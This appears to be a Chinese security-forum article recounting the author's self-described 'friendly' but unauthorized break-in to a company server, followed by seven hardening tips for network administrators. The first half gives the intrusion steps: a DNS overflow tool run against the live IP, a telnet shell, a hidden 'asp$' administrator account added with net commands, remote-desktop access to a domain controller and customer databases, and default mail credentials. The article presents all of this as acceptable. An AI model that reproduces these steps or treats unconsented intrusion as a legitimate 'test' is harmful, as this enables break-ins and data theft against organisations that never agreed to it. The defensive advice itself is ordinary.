首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

由安全检测引发的思考?对企业网管几点忠告


http://www.gipsky.com/
从一次友情安全检测谈起。前段时间,我上某企业的网站查找资料。看网页做得极其精致,于是想看看安全性到底如何。网站是Asp动态页面,采用的是某企业网站系统。

  先看看该网站Web服务器的IP地址,打开命令提示符,敲入如下命令:

  ping www.*.com

  得知ip地址为:202.2##.*.196

  通过http://www.webhosting.info/查询得知这是一台独立的服务器,只有一个站点。

  用扫描器看看,扫描结果,该服务器开了如下端口以下是引用片段:

  80 53 1433 25 3389



看来这台服务器,开了Web端口,这是当然的,因为要运行网站吗。

  开了53端口,这是DNS端口,看来该Web主机也是个DNS服务器。

  开了1433端口,这是SQL-Server数据库端口,因为是Web服务器,所有要运行数据库了。

  开了25端口,看来这还是个邮件服务器。

  开了3389端口,可以远程登录。

  当时感叹,这台服务器真能干呀!

  首先对asp页面进行了初步测试,看来没有什么明显的漏洞。既然开了53端口,那就看看DNS溢出。找了一个dns溢出工具,在命令行下敲入如下命令:

  dns -s 202.2##.*.196

  显示如下:(图1)



图1



竟然存在DNS溢出漏洞!这个管理员真是失职,连补丁都没有打。

  服务器采用的是<U>windows</U> 2000,在1052端口存在DNS溢出漏洞。

  继续在命令行下,敲入如下命令:

  dns -t2000all 202.2##.*.196 1052

  显示如下:(图2)



图2溢出成功!重新打开另外一个命令提示符,敲入如下命令:





  telnet 202.2##.*.196 1100

  速度很快,返回一个shell,溢出成功。

  在telnet界面中敲入如下命令:

  net query

  显示如下:(图3)



图3





以下是引用片段:

  query user

  USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME

  >administrator console 0 已断开 . 2007-11-7 17:51



看来管理员不在线。

  进去看看,在Telnet命令提示符下敲入如下命令



以下是引用片段:

  net user asp$ "test" /add

  net localgroup administrators asp$ /add  



建立一个具有管理员权限的asp$账户。

  在本机运行“mstsc”,打开“远程桌面连接工具”,

  输入IP地址:202.2##.*.196

  用户名:asp$

  密码:test

  连接......

  成功进入!

  打开“管理工具”,发现这台主机,还是一个域控制器!打开“域用户和计算机”,域成员竟然有43511个。看来这个企业的局域网的规模不小。(图4)



图4





然后看数据库,果然是SQL-SERVER,有两个数据库,一个是web数据库,一个是企业的数据库,有销售、客户等资料。

  邮件服务器采用的是WebEasyMail,账户和密码都是默认的,既然如此它也不在话下。

  安全检测到此为止,删掉用户和相关痕迹,给管理员留言,撤人。

  至此,完全控制了这台服务器。但是岂止如此,该企业的内部资料,局域网不用在你的掌握之中吗?

  令人费解的是,为什么一台主机要兼web、数据库、邮件服务、域控制器这么多的角色呢?

  随后的几天进行了几次这样的测试,发现这绝不是个别现象!特别是一些中小企业,往往一个web服务器、兼数据库、邮件服务器、域控制器中的两个或者几个角色。鉴于次,我作为一个单位的网络管理员对我的同行们几点忠告:

  <B>1、打补丁</B>。这应该是企业网络安全的基本要求,也是杜绝网络入侵的首要措施。将微软提供的各种重要系统安全补丁都打上,不要怕麻烦,因为被别人入侵后更麻烦。一旦有新的补丁发布,网络管理员将在发布后的4小时内下载并检查该补丁。鉴于网络所面临的重大风险,可能一个“紧急”的补丁还在测试当中就被发布了。在所有情况下,部门必须对补丁进行测试(无论是在补丁发布前测试或是一边部署一边测试),并进行相关的记录,以备审核和效果追踪。但是让人无奈的是,有部分企业的网络管理员,主机千疮百孔也不知道补一补。甚至有些管理员自作主张关闭了“自动更新”服务。就比如这位管理员到现在为止都没有打补丁,我写这篇文章时就是用这台服务器截的图。

 <B> 2、服务器分离、专用</B>。最好把web服务器、数据库服务器、邮件服务器、域控制器分离,各种服务器专用。这样不至于一个攻破全线崩溃。如果企业由于经济原因没有那么多的服务器,必须要做好服务器的安全配置。

  <B>3、做好安全部署</B>。设置隔离区,把邮件服务器等放到该区,并把该区的服务器映射到外网的合法地址上以便nternet网上用户访问。严禁Internet网上用户到企业内部网的访问。允许企业内部网通过地址转换方式(NAT)访问nternet。允许拨号用户通过拨号访问服务器到企业内部网访问。

 <B> 4、关闭没有用的服务</B>。最少的服务就是最大的安全。我在测试中看到有些服务器开了DNS服务、DHCP服务、IIS等等,几乎把所有的服务都安装了。但是我看这些服务器根本就用不着它。但恰恰是这些无用的服务让服务器沦陷。另外比如打印、远程注册表操作,信息发送等不必要的服务都关掉。

 <B> 5、复杂密码</B>。网络管理员大都比较重视管理员密码,但对于数据库,企业邮箱系统都采用默认的密码,这就非常危险。我在测试中看到有的数据库服务器采用了默认的SA账户,以sa或者一些简单密码甚至干脆是空密码!尽管他的管理员密码如何强,但如果数据库用了空密码,那服务器照样被拿下。

 <B> 6.如果没必要</B>,<B>IIS一定不要安装。</B>如果非要安装一定要进行安全设置。我在测试中看到有些数据库服务器,却安装了IIS。

  <B>7、管理员必须会组策略、IPsec、日志查看。</B>能够通过部署组策略使系统更安全,用IPsec进行网络安全的过滤,会查看各种日志(系统日志、安全日志、DNS日志、iis记录等)。要有灵敏的嗅觉,不然别人入侵了你还不知道。

  为了企业网络的安全,也为了自己的饭碗,写出来与网络管理员们共勉。
<< 让电脑插入自己 U 盘后才能启动Windows 几种安全问题的解决方案 为你排忧解难 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号